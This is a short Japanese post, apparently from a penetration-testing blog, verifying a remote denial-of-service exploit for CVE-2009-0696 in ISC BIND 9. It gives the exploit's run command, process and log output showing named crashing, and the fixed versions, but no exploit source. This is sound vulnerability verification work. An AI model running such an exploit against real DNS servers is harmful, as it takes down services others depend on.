ISC BIND 9 Dynamic Update Message Remote DoS
BIND 9に対してリモートからDoSをする攻撃コードの検証をしました。
利用する脆弱性はCVE-2009-0696です。
【exploit 実行】
./bind9_dum_dos 10.100.0.130 pentest.jp
【対象上での変化】
[root@victim ~]# ps ax|grep named
18958 ? Ssl 0:00 /usr/sbin/named -u named
19002 pts/2 S+ 0:00 grep named
[root@victim ~]# ps ax|grep named
[root@victim ~]#
1回のpsコマンドはexploit実行前。2回目はExploit実行後です。
プロセスがいなくなっていることが分かります。
また、エラーログには以下のような記述が書き出されていました。
Aug 3 13:40:32 victim named[19019]: db.c:579: REQUIRE(type != ((dns_rdatatype_t)dns_rdatatype_any)) failed
Aug 3 13:40:32 victim named[19019]: exiting (due to assertion failure)
現在のところ影響を受けないとされているバージョンは以下の3つだそうです。
ISC BIND 9.6.1 P3
ISC BIND 9.5.1 P3
ISC BIND 9.4.3 P3
2009/08/04追記:
影響を受けるバージョンとしてBIND9.3以前も影響を受けるようですがEOLなので修正版は提供されないようです。